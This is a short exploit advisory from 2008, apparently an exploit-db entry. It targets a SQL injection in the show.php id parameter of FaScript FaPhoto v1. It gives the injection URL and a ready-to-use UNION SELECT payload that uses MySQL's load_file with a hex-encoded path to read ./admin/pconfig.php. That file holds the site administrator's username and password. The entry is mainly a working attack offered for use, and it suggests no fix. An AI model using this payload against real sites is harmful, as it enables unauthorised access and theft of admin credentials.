FaScript FaPhoto v1 (show.php id) SQL Injection Vulnerability :: 2008-04-01
##################################################################################### # # #AUTHOR : IRCRASH (Dr.Crash) # # # #Script Download : http://en.fascript.com/en.faphoto.zip # # # #Injection Adress : http://Sitename/faname/show.php?id=<SqL Code> # # # #Help : In This Script Admin Username and Password Save in ./admin/pconfig.php # # You can open this file with load_file Function in mysql and see admin # # Username and password in Page Source # # # # ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 # # # #SQL Code for Read pconfig.php : 999999%27union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3,4,5,6/* # # # Our site : HTTP://IRCRASH.COM # # # # Tnx God # #####################################################################################Download
http://www.exploit-db.com/exploits/5334/